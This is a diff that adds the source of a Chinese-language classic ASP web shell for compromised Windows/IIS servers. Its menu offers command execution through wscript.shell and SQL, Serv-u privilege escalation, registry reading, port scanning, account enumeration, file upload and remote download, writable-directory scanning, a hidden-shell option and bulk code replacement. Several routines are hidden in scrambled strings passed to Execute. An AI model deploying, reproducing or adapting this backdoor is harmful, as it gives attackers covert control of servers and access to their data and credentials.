+		Response.Write "[Ŀ¼]<font color=#0000FF>"& Path&"</font><br>"
+	end if
+
+Set FSO = Server.CreateObject(CONST_FSO)
+set f = fso.getfolder(Path)
+
+
+
+if (CheckFile=True) and (IS_TEMP_DIR=false) then
+b=false
+'======================================
+for each file in f.Files
+	Re = CheckFileWrite(Path&file.name) '����Ƿ��д
+	if Re =0 then
+		Response.Write "[�ļ�]<font color=red>"& Path&file.name&"</font><br>"
+		b =true
+	else
+		if ShowNoWriteDir then Response.Write "[<font color=red>�ļ�</font>]"&Path&file.name&" [<font color=red>"&Err.Description&"</font>]<br>"			
+	end if
+next
+if b then response.Flush '��������ݾ�ˢ�¿ͻ�����ʾ
+'======================================
+end if
+
+
+
+'============= Ŀ¼��� ================
+for each file in f.SubFolders
+if CheckNextDir=false then '�Ƿ�����һ��Ŀ¼
+	re = CheckDirIsOKWrite(Path&file.name)
+	if (re =0) or (re=1) then
+		Response.Write "[Ŀ¼]<font color=#0066FF>"& Path&file.name&"</font><br>"
+	end if
+end if
+	
+	if (CheckNextDir=True) and (IS_TEMP_DIR=false) then '�Ƿ�����һ��Ŀ¼
+			ShowDirWrite_Dir_File Path&file.name,CheckFile,CheckNextDir '�ټ����һ��Ŀ¼
+	end if
+next
+'======================================
+Set FSO = Nothing
+set f = Nothing
+end function
+
+Server.ScriptTimeout=999999999:Response.Buffer=true:On Error Resume Next:
+ExeCute "sub ShowErr():If Err Then:RRS""<br><a href='javascript:history.back()'><br>&nbsp;"" & Err.Description & ""</a><br>"":Err.Clear:Response.Flush:End If:end sub"
+Sub RRS(str):response.write(str):End Sub
+Function RePath(S)
+RePath=Replace(S,"\","\\")
+End Function
+Function RRePath(S):RRePath=Replace(S,"\\","\")
+End Function
+URL=Request.ServerVariables("URL")
+ServerIP=Request.ServerVariables("LOCAL_ADDR")
+Action=Request("Action"):Pos=2
+RootPath=Server.MapPath(".")
+WWWRoot=Server.MapPath("/")
+Serveru=request.servervariables("http_host")&url
+FolderPath=Request("FolderPath"):
+Pn=pos*44:FName=Request("FName"):pso=5:BackUrl="<br><br><center><a href='javascript:history.back()'>����</a></center>"
+RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
+RRS"<title>"&mmname&" - "&ServerIP&"--Soft - "&serversoft&"</title>"
+RRS ""&copyurl&""
+rrS"<style type=""text/css"">"
+rrs"body,td,center,label{font-size: 12px;background-color:#383838; color:#00ff00;SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #008000; SCROLLBAR-SHADOW-COLOR: #008000; SCROLLBAR-3DLIGHT-COLOR: #00FF00; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: #000000; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #000000}"
+rrs"input,select,textarea{BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-LEFT-COLOR: #008000; BACKGROUND: #383838; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #008000; COLOR: #00ff00; BORDER-TOP-COLOR: #008000; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #008000}"
+rrs"hr{color:#00ff00}"
+rrs".C{background-color:#000;border:0px}"
+rrs".cmd{background-color:#000;color:#FFF}"
+rrs"body{margin: 0px;margin-left:4px;}"
+rrs"BODY{color:#383838}"
+rrs"a{color:#008000;text-decoration: none;}a:hover{color:#00ff00;background:#000}"
+rrs".am{color:#888;font-size:12px;}"
+rrs"</style>"
+rRs"</style>"
+ExeCute SinfoEn("lError=kilnerrodow.o;}win trueeturns(){rError killctiont>funscrip=javaguaget lanscripRRS~<rs;~`lse;}rn fa retu;else trueeturn~~))r�˲�����ȷ��Ҫִ��rm(~~confi{if (sok()on yeunctiRRS~f~`();}~ubmitorm.saddrf;top.oldere = F.valurPathFoldeform..addr){topolderder(FowFolon ShunctiRRS~f`~~;}} = ~~valueName.orm.Fhidef{top.}elseit();.submeformp.hidon;toFActiue = n.valActioform..hide){top=nullName!}if(Der~~;~~Othme = e{DNa;}elsDNameue = e.val.FNameformp.hide);to,FNam���ڣ�~~���ļ��Ƿ�ȫ����,עMdb�ļ���Ҫѹ����(~~����rompte = p{DNamdb~~)pactM~~Comion==(FActse ife;}el DNamlue =me.vam.FNadeforop.hime);t~,FNa��ͬ����~��,ע�ⲻb�ļ�ȫ���½���Md~������Ҫmpt(~= proName ~~){DteMdb~Creaon==~FActie if(;}elsDNameue = e.val.FNameformp.hide);to,FNamȫ����~~�����ļ���������Ҫ��pt(~~ promame =~){DNlder~NewFon==~~Actio if(F}elseName;|~~+D~~|||e += .valuFNameform..hide);topFName����~~,���ļ���ȫ���ƶ���Ŀ(~~����rompte = p{DNamer~~)eFold~~Movion==(FActse ife;}el+DNam|||~~= ~~|lue +me.vam.FNadeforop.hime);t~,FNa��ȫ����~��Ŀ���ļ��������ƶ�pt(~~ promame =~){DNlder~opyFo==~~Cctionif(FAelse ame;}~~+DN~|||| += ~valueName.orm.Fhidef;top.Name)��~~,F���ļ�ȫ�����ƶ���Ŀ(~~����rompte = p{DNamle~~)oveFi==~~Mctionif(FAelse ame;}~~+DN~|||| += ~valueName.orm.Fhidef;top.Name)��~~,F���ļ�ȫ���븴�Ƶ�Ŀ(~~����rompte = p{DNamle~~)opyFi==~~Cctionif(FAName;e = F.valuFNameform..hide){topctionme,FAm(FNallForon FuunctiRRS~f~",Pso)
+RRS"function DbCheck(){if(DbForm.DbStr.value == """"){alert(""�����������ݿ�"");FullDbStr(0);return false;}return true;}":RRS"function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = ""Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&RePath(Session("FolderPath"))&"\\db.mdb;Jet OLEDB:Database Password=***"";Str[1] = ""Driver={Sql Server};Server="&ServerIP&",1433;Database=DbName;Uid=sa;Pwd=****"";Str[2] = ""Driver={MySql};Server="&ServerIP&";Port=3306;Database=DbName;Uid=root;Pwd=****"";Str[3] = ""Dsn=DsnName"";Str[4] = ""SELECT * FROM [TableName] WHERE ID<100"";Str[5] = ""INSERT INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')"";Str[6] = ""DELETE FROM [TableName] WHERE ID=100"";Str[7] = ""UPDATE [TableName] SET USER=\'username\' WHERE ID=100"";Str[8] = ""CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"";Str[9] = ""DROP TABLE [TableName]"";Str[10]= ""ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"";Str[11]= ""ALTER TABLE [TableName] DROP COLUMN PASS"";Str[12]= ""��ֻ��ʾһ������ʱ������ʾ�ֶε�ȫ���ֽڣ������������Ʋ�ѯʵ��.\n����һ������ֻ��ʾ�ֶε�ǰ��ʮ���ֽ�X"";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = """";abc.innerHTML=""<center>��ȷ�ϼ��������ݿ�������SQL�����������5</center>"";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}":RRS"function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert(""�������ݿ����Ӵ��Ƿ���ȷ!"");return false;}if(str.length<10){alert(""����SQL����Ƿ���ȷ!"");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="""";DbForm.submit();return true;}"
+RRS"function gotoURL(targ,selObj,restore){if(selObj.options[selObj.selectedIndex].js==1){eval(selObj.options[selObj.selectedIndex].value);if (restore) selObj.selectedIndex=0}else{eval(targ+"".location='""+selObj.options[selObj.selectedIndex].value+""'"");if (restore) selObj.selectedIndex=0;}}</script>"
+rrs "<body" 
+If Action="" then RRS " scroll=no"
+rrs ">"
+Dim Sot(13,2):Sot(0,0) = "Scripting.FileSystemObject":Sot(0,2) = "�ļ��������":Sot(1,0) = "wscript.shell":Sot(1,2) = "������ִ�����":Sot(2,0) = "ADOX.Catalog":Sot(2,2) = "ACCESS�������":Sot(3,0) = "JRO.JetEngine":Sot(3,2) = "ACCESSѹ�����":Sot(4,0) = "Scripting.Dictionary":Sot(4,2) = "�������ϴ��������":Sot(5,0) = "Adodb.connection":Sot(5,2) = "���ݿ��������":Sot(6,0) = "Adodb.Stream":Sot(6,2) = "�������ϴ����":Sot(7,0) = "SoftArtisans.FileUp":Sot(7,2) = "SA-FileUp �ļ��ϴ����":Sot(8,0) = "LyfUpload.UploadFile":Sot(8,2) = "���Ʒ��ļ��ϴ����":Sot(9,0) = "Persits.Upload.1":Sot(9,2) = "ASPUpload �ļ��ϴ����":Sot(10,0) = "JMail.SmtpMail":Sot(10,2) = "JMail �ʼ��շ����":Sot(11,0) = "CDONTS.NewMail":Sot(11,2) = "����SMTP�������":Sot(12,0) = "SmtpMail.SmtpMail.1":Sot(12,2) = "SmtpMail�������":Sot(13,0) = "Microsoft.XMLHTTP":Sot(13,2) = "���ݴ������"
+For i=0 To 13
+Set T=Server.CreateObject(Sot(i,0))
+If -2147221005 <> Err Then
+IsObj=" ��"
+Else
+IsObj=" ��"
+Err.Clear
+End If
+Set T=Nothing
+Sot(i,1)=IsObj
+Next
+
+
+
+
+If FolderPath<>"" then
+Session("FolderPath")=RRePath(FolderPath)
+End If:If Session("FolderPath")="" Then
+FolderPath=RootPath
+Session("FolderPath")=FolderPath
+End if
+Function MainForm() 
+RRS"<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame"">"
+RRS"<input type=""hidden"" name=""Action"">"
+RRS"<input type=""hidden"" name=""FName"">"
+RRS"</form>"
+RRS"<tr>X��<a href='javascript:ShowFolder(""C:\\Program Files"")'>Program</a>2E��<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\"")'>AllUsers</a>n#��<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\`��ʼe�˵�\\����\\"")'>����</a>ib��<a href='javascript:ShowFolder(""c:\\Documents and Settings\\All Users\\a��ʼp�˵�\\����\\����"")'>����</a>ib��<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\"")'>pcAnywhere</a>LM��<a href='javascript:ShowFolder(""c:\\Program Files\\serv-u\\"")'>serv-u</a>Dv��<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\Media Index\\"")'><font color=red>~���ⳣд~</font></a>:����<a href='javascript:ShowFolder(""C:\\Program Files\\Microsoft SQL Server\\"")'>SQL</a>IJ��<a href='javascript:ShowFolder(""c:\\PHP"")'>PHP</a>ED��<a href='javascript:ShowFolder(""C:\\WINDOWS\\system32\\config\\"")'>config</a>WP��<a href='javascript:ShowFolder(""c:\\WINDOWS\\system32\\inetsrv\\data\\"")'>data</a>eF<a href='javascript:ShowFolder(""c:\\windows\\Temp\\"")'>Temp</a>m?<a href='javascript:ShowFolder(""C:\\RECYCLER\\"")'>RECYCLER</a>v,<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents\\"")'>��д</a>7"
+RRS"<table width='100%'>"
+RRS"<form name='addrform' method='post' action='"&URL&"' target='_parent'>"
+RRS"<tr><td width='40' align='left'>��ַ��</td><td>"
+RRS"<input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'>"
+RRS"</td><td width='70' align='center'><input name='Submit' type='submit' value='GOGO'>" 
+RRS"</td></tr></form></table>"
+RRS"<table width='100%' height='96%' style='border:1px solid #008000;' cellpadding='0' cellspacing='0'>"
+RRS"<td width='135' id=tl>"
+RRS"<iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></iframe></td>"
+RRS"<td width=1 style='background:#008000'></td><td width=1 style='padding:2px'><a onclick=""document.getElementById('tl').style.display='none'"" href=##><b>����</b></a><p><a onclick=""document.getElementById('tl').style.display=''"" href=##><b>��ʾ</b></a></p></td><td width=1 style='background:#008000'><td>"
+RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='0'></iframe>"
+End Function:Function MainMenu()
+RRS"<table width='100%' cellspacing='0' cellpadding='0'>"
+RRS"<tr><td><hr hight=1 width='100%'>"
+RRS"</td></tr>"
+If soT(0,1)=" ��" Then
+RRS"<tr><td height='24'>��Ȩ��</td></tr>"
+Else
+Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing
+RRS"<tr><td height='20'> <a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'>��վ��Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>������Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=goback' target='FileFrame'>���ϼ�Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>���½�Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>���½��ı�</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=downloads' target='FileFrame'>��Զ������</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=UpFile' target='FileFrame'>���ϴ��ļ�</a><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ScanDriveForm' target='FileFrame'>����дĿ¼</font></a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=att' target='FileFrame'>���޸�Ȩ��</font></a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=hiddenshell' target='FileFrame'>�����ش���</a><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=fuzhutq1' target='FileFrame'><font color=red>������������Ȩ����</a></font><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=fuzhutq2' target='FileFrame'><font color=red>������������Ȩ����</a></font><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=fuzhutq3' target='FileFrame'><font color=red>��N��������Ȩ����</a></font><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=fuzhutq4' target='FileFrame'><font color=red>������������Ȩ����</a></font><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=fuzhutq5' target='FileFrame'><font color=red>��ɨĿ¼��д��D��</a></font><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Course' target='FileFrame'>���û��˺�</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=adminab' target='FileFrame'>�������Ա</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=getTerminalInfo' target='FileFrame'>���Զ���¼</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ServerInfo' target='FileFrame'>�����֧��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cmd1Shell' target='FileFrame'>��ִ��CMD����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cmd2' target='FileFrame'>��Cmd2</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=MMD' target='FileFrame'>��SQLִ��CMD</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ScanPort' target='FileFrame'>���˿�ɨ��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Servu' target='FileFrame'>��Serv-u��Ȩ</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=suftp' target='FileFrame'>��Serv-u Ftp��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Servu7x' target='FileFrame'>��Serv-u7x��Ȩ</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ReadREG' target='FileFrame'>����ע���</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=aspx' target='FileFrame'>��ASPX̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=php' target='FileFrame'>��PHP̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=jsp' target='FileFrame'>��JSP̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cplgm&M=1' target='FileFrame'>���߼�����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cplgm&M=2' target='FileFrame'>����������</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=Cplgm&M=3' target='FileFrame'>�������滻</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=DbManager' target='FileFrame'>�����ݿ����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=PageAddToMdb' target='FileFrame'>��������</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Logout' target='_top'>���˳���¼</a></td></tr>"
+End if
+RRS"</table></table>"
+End Function:
+Sub ScanDriveForm() 
+    Dim FSO,DriveB
+	Set FSO = Server.Createobject("Scripting.FileSystemObject")
+Response.Write "<TABLE width=480 border=0 align=center cellpadding=3 cellspacing=1 bgColor=#fff>"
+Response.Write "  <TR>"
+Response.Write "    <TD colspan=5 >����/ϵͳ�ļ�����Ϣ</TD>"
+Response.Write "  </TR>"
+
+
+  For Each DriveB in FSO.Drives
+
+Response.Write "  </TR>"
+Next
+Response.Write "  <TR>"
+Response.Write "    <FORM action="
+Response.Write "?Action=ScFolder&Folder="
+Response.Write FSO.GetSpecialFolder(0)
+Response.Write " method=Post>		  "
+Response.Write "	<TD align=middle><B>Windows�ļ���</B></TD>"
+Response.Write "	<TD colspan=3>"
+Response.Write FSO.GetSpecialFolder(0)
+Response.Write "</TD>"
+Response.Write "	<TD align=middle><INPUT type=submit value=��ϸ����></TD>"
+Response.Write "	</FORM>"
+Response.Write "  </TR>"
+Response.Write "  <TR>"
+Response.Write "    <FORM action="
+Response.Write "?Action=ScFolder&Folder="
+Response.Write FSO.GetSpecialFolder(1)
+Response.Write " method=Post>		  "
+Response.Write "	<TD align=middle><B>System32�ļ���</B></TD>"
+Response.Write "	<TD colspan=3>"
+Response.Write FSO.GetSpecialFolder(1)
+Response.Write "</TD>"
+Response.Write "	<TD align=middle><INPUT type=submit value=��ϸ����></TD>"
+Response.Write "	</FORM>"
+Response.Write "  </TR>"
+Response.Write "  <TR>"
+Response.Write "    <FORM action="
+Response.Write "?Action=ScFolder&Folder="
+Response.Write FSO.GetSpecialFolder(2)
+Response.Write " method=Post>		  "
+Response.Write "	<TD align=middle><B>ϵͳ��ʱ�ļ���</B></TD>"
+Response.Write "	<TD colspan=3>"
+Response.Write FSO.GetSpecialFolder(2)
+Response.Write "</TD>"
+Response.Write "	<TD align=middle><INPUT type=submit value=��ϸ����></TD>"
+Response.Write "	</FORM>"
+Response.Write "  </TR>"
+Response.Write "</TABLE><BR>"
+Response.Write "<DIV align=center>"
+Response.Write "<b>��ǰ��վ����·��:"&Server.MapPath("/")&"</b>"
+Response.Write "  <FORM Action="
+Response.Write "?Action=ScFolder method=Post>ָ���ļ��в�ѯ��"
+Response.Write "    <INPUT type=text name=Folder>"
+Response.Write "	<INPUT type=submit value=���ɱ���>Wָ���ļ���·��b�磺F:\ASP\"
+Response.Write "  </FORM>"
+Response.Write "<DIV>"
+	Set FSO=Nothing
+End Sub
+
+Sub ScanDrive(Drive) 
+    Dim FSO,TestDrive,BaseFolder,TempFolders,Temp_Str,D
+	If Drive <> "" Then
+	    Set FSO = Server.Createobject("Scripting.FileSystemObject")
+		Set TestDrive = FSO.GetDrive(Drive)
+		If TestDrive.IsReady Then
+		    Temp_Str = "<LI>���̷������ͣ�" & Red(TestDrive.FileSystem) & "<LI>�������кţ�" & Red(TestDrive.SerialNumber) & "<LI>���̹�������" & Red(TestDrive.ShareName) & "<LI>������������" & Red(GetTheSize(TestDrive.TotalSize)) & "<LI>���̾�����" & Red(TestDrive.VolumeName) & "<LI>���̸�Ŀ¼:" & ScReWr((Drive & ":\"))
+
+			Set BaseFolder = TestDrive.RootFolder
+			Set TempFolders = BaseFolder.SubFolders
+			For Each D in TempFolders
+			    Temp_Str = Temp_Str & "<LI>�ļ��У�" & ScReWr(D)
+			Next
+			Set TempFolder = Nothing
+			Set BaseFolder = Nothing
+	    Else
+		    Temp_Str = Temp_Str & "<LI>���̸�Ŀ¼:" & Red("���ɶ�:(")
+			Dim TempFolderList,t
+			t=0
+			Temp_Str = Temp_Str & "<LI>" & Red("���Ŀ¼���ԣ�")
+			TempFolderList = Array("windows","winnt","win","win2000","win98","web","winme","windows2000","asp","php","Tools","Documents and Settings","Program Files","Inetpub","ftp","wmpub","tftp")
+			For i = 0 to Ubound(TempFolderList)
+			    If FSO.FolderExists(Drive & ":\" & TempFolderList(i)) Then
+				    t = t+1
+					Temp_Str = Temp_Str & "<LI>�����ļ��У�" & ScReWr(Drive & ":\" & TempFolderList(i))
+			    End if
+		    Next
+			If t=0 then Temp_Str = Temp_Str & "<LI>�����" & Drive & "�̸�Ŀ¼����δ�з���:("
+	    End if
+		Set TestDrive = Nothing
+	    Set FSO = Nothing
+		Temp_Str = Temp_Str & "<LI>ע�⣺" & Red("��Ҫ���ˢ�±�ҳ�棬������ֻд�ļ��л����´��������ļ�!")
+		Message Drive & ":������Ϣ",Temp_Str,1
+	End if
+End Sub
+
+Sub ScFolder(folder) 
+    On Error Resume Next
+	Dim FSO,OFolder,TempFolder,Scmsg,S
+	Set FSO = Server.Createobject("Scripting.FileSystemObject")
+	If FSO.FolderExists(folder) Then
+	    Set OFolder = FSO.GetFolder(folder)
+		Set TempFolders = OFolder.SubFolders
+		Scmsg = "<LI>ָ���ļ��и�Ŀ¼��" & ScReWr(folder)
+		For Each S in TempFolders
+		     Scmsg = Scmsg&"<LI>�ļ��У�" & ScReWr(S)  
+		Next
+		Set TempFolders = Nothing
+		Set OFolder = Nothing
+	Else
+	    Scmsg = Scmsg & "<LI>�ļ��У�" & Red(folder & "�����ڻ��޶�Ȩ��!")
+	End if
+	Scmsg = Scmsg & "<LI>ע�⣺" & Red("��Ҫ���ˢ�±�ҳ�棬������ֻд�ļ��л����´��������ļ�!")
+	Set FSO = Nothing
+	Message "�ļ�����Ϣ",Scmsg,1
+End Sub
+
+Function ScReWr(folder):
+ On Error Resume Next
+   Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename
+   Set FSO = Server.Createobject("Scripting.FileSystemObject")
+   Set TestFolder = FSO.GetFolder(folder)
+   Set TestFileList = TestFolder.SubFolders
+   RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp"
+   For Each A in TestFileList
+   Next
+   If err Then
+       err.Clear
+	   ReWrStr = folder & "<FONT color=#ff2222> ���ɶ�,"
+	   FSO.CreateTextFile folder & RndFilename,True
+	   If err Then
+	       err.Clear
+		   ReWrStr = ReWrStr & "����дq</FONT>"
+	   Else
+	       ReWrStr = ReWrStr & "��дq</FONT>"
+		   FSO.DeleteFile folder & RndFilename,True
+	   End If
+   Else
+       ReWrStr = folder & "<FONT color=#ff2222> �ɶ�,"
+	   FSO.CreateTextFile folder & RndFilename,True
+	   If err Then
+	       err.Clear
+		   ReWrStr = ReWrStr & "����дY</FONT>"
+	   Else
+	       ReWrStr = ReWrStr & "��дY</FONT>"
+		   FSO.DeleteFile folder & RndFilename,True
+	   End if
+   End if
+   Set TestFileList = Nothing
+   Set TestFolder = Nothing
+   Set FSO = Nothing
+   ScReWr = ReWrStr
+End Function
+
+Sub Message(state,msg,flag)
+Response.Write "<TABLE width=480 border=0 align=center cellpadding=0 cellspacing=1 bgcolor=#fff>"
+Response.Write "  <TR>"
+Response.Write "    <TD >ϵͳ��Ϣ</TD>"
+Response.Write "  </TR>"
+Response.Write "  <TR>"
+Response.Write "    <TD align=middle bgcolor=#ecfccd>"
+Response.Write "	  <TABLE width=82% border=0 cellpadding=5 cellspacing=0>"
+Response.Write "	    <TR>"
+Response.Write "		  <TD><FONT color=red>"
+Response.Write state
+Response.Write "</FONT></TD>"
+Response.Write "		<TR>"
+Response.Write "		  <TD><P>"
+Response.Write msg
+Response.Write "</P></TD>"
+Response.Write "		</TR>"
+Response.Write "	  </TABLE>"
+Response.Write "	</TD>"
+Response.Write "  </TR>"
+Response.Write "  <TR>"
+Response.Write "    <TD class=TBEnd>"
+Response.Write "	"
+If flag=0 Then
+Response.Write "	      <INPUT type=button value=�ر� onclick=""window.close();"">"
+Response.Write "	"
+Else
+Response.Write "	      <INPUT type=button value=���� onClick=""history.go(-1);"">"
+Response.Write "	"
+End if
+Response.Write "	</TD>"
+Response.Write "  </TR>"
+Response.Write "</TABLE>"
+End Sub
+Function Red(str):Red = "<FONT color=#ff2222>" & str & "</FONT>"
+End Function
+Sub PageAddToMdb():ExeCute SinfoEn("atePth, cteAthm Dih`~)cteAth(~stueeq R =cteAth`~)thPahe~tt(esquRe= h atePth`0000=1uteOimtTipcr.SerrvSe0`he Tb~MdTodd~a= t Ache tIfn`thPahe(tdboMdTad)`UrckBa~&v>di</��!����>��br><erntcen=igalv di~<S RRl`nd.EseonspRe`Ifd En`he Tb~MdomFrseeael~r= t Ache tIfn`thPahe(tckPaun)`UrckBa~&v>di</��!����>��br><erntcen=igalv di~<S RRl`nd.EseonspRe`Ifd En`��:�д��ļ�r><bS~RR~`t>os=podthmem or<fS~RR~`0>=8zesi~ ~~& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnp<iS~RR~`t>Ache=tmenab MdTodd=aueal venddhie=yp tutnp<iS~RR~`n>iopt/oO<FS>��pp=aueal vontiop><ontiop</SO>Fso=fueal vontiop><odthMehe=tmenat ecel<sS~RR~`>~ctlese</S~RR`>~��'ʼ��'��e=luvat miub=spetyt puin <S~RR`��~Ŀ¼ͬ��ľ��SH��H,λ�ļ�db.mSH��H���� ��ע:r><br><bS~RR`>~rmfo</S~RR`/>br:<��)O֧FS(��⿪����>��r/<hS~RR~`t>os=podthmem or<fS~RR~`0>=8zesi~ b~mdH.HS~\& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnp<iS~RR~`'>����'��e=luvat miub=spetyt puin><cteAthe=am ndbmMroeFasleree=luvan deid=hpetyt puin <S~RR~`¼�¼�Ŀ��ͬHľHSλ�ڼ������ĵ������� ��ע:r><br><bS~RR~`>~rmfo</S~RR",Pos):End Sub
+
+
+Sub addToMdb(thePath):ExeCute SinfoEn("xtNee umes Rorrr EOn`lotaCado ar,Stnnco, amrest, nnco, rsm Dig`t~SerdcoReB.ODAD(~ctjeObteeaCrr.veer S =rst Se)`~)amreStB.ODAD(~ctjeObteeaCrr.veer S =amrestt Se`~)ontiecnnCoB.ODAD(~ctjeObteeaCrr.veer S =nncot Se`~)ogalat.COXAD(~ctjeObteeaCrr.veer S =ogalatoCadt Se`~)db.mSH~Hh(atpPMar.veer S &=~ceurSoa at D0;4.B.EDOLt.Jet.ofoscrMir=deviro~P= r Stnnco`Stnncoe atre.CogalatoCadr`Stnncon pe.Onncor`)~gema IntteoneCil fr,harCVah atePth, EDERSTLU CEY KRYMARI P1)0,Y(ITNTDE Int iIda(ateDil Fleab TteeaCr(~tecuxe.Ennco)`pe.Oamrestn`= e yp.Tamrest1` 33,, nnco, a~ateDil~Fn pe.Ors`enTh~ so~f= ) d~hoeteMth(~stueeq RIf`eatr ss, rh,atePthb MdoreFreoTfsm`ls Ee`amrest, rs, thPahe tdbrMFoeeTrsa`Ifd En`selo.Crs`selo.CnnCo`selo.Camrest`nghiot N =rst Se`nghiot N =nncot Se`nghiot N =amrestt Se`nghiot N =ogalatoCadt Se",Pos):End Sub:
+Function fsoTreeForMdb(thePath, rs, stream):ExeCute SinfoEn("FileL, sysfilesers,  foldlder,theFotem, Dim iist`SH.ldmdb$H$HSH.t = ~leLissysFib$~`se Th= Falath) (thePxistslderE~).FobjectstemOileSying.Fcriptct(~SeObjeCreatrver.If Seen`����!~)���߲�����Ŀ¼������ & ~ ePathrr(thshowE`End If`(thePolder.GetFect~)emObjeSystg.Filiptin(~ScrbjecteateOer.Cr Servder =heFolSet tath)`r.FilFolde= theiles Set fes`ubFolder.SheFols = tolderSet fders`n foltem Iach iFor Eders`treamrs, sath, tem.PMdb ieeForfsoTr`Next`n filtem Iach iFor Ees`<= 0 ~$~) me & em.Na & it, ~$~eListysFilStr(sIf InThen`rs.AddNew`Path,item. Mid(h~) =hePatrs(~t 4)`Path)item.File(dFromm.Loastrea`m.Reastrea~) = ntentileCors(~fd()`rs.Update`End If`Next`= Notiles Set fhing`othins = NolderSet fg` Nothder =heFolSet ting",Pso):End Function:Sub unPack(thePath):ExeCute SinfoEn("xtNee umes Rorrr EOn`0000=1uteOimtTipcr.SerrvSe0`deoleFth, trnSon cm,eatr sn,on cr,st, ws, rsm Dir`~\& ) .~(~thPaap.MerrvSe= r st~`~)etdSorec.RDBDO~At(ecbjeOatre C =rst Se`m~eatr.SDBDO~At(ecbjeOatre C =amrestt Se)`n~ioctneon.CDBDO~At(ecbjeOatre C =nncot Se)`~;& h atePth& ~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~P= r Stnnco~`Stnncon pe.Onncor` 11,, nnco, a~ateDil~Fn pe.Ors`pe.Oamrestn`= e yp.Tamrest1`Eos. rilnt UDof`~)~\, ~)thPahe~ts((revrRStIn, ~)thPahe~ts((rftLe= r deoleFth)`he Tseal F =r)deoleFth& r sts(stxirEdeol.F~)ctjeObemstSyleFig.inptriSc(~ctjeObteeaCrr.veer SIfn`erldFohe t &tr(serldFoteeacr)`Ifd En`s(Eoet.Samrest)`~)ntteoneCil~fs( rteri.Wamrest` 2),h~atePth(~rs& r ste iloFeTav.Samrest`exeNov.Mrst`opLo`selo.Crs`selo.Cnnco`selo.Camrest`nghiot N =wst Se`nghiot N =rst Se`nghiot N =amrestt Se`nghiot N =nncot Se",Pos):End Sub:Sub createFolder(thePath):ExeCute SinfoEn("m Dii`\~ ~h,atePthr(stIn= i 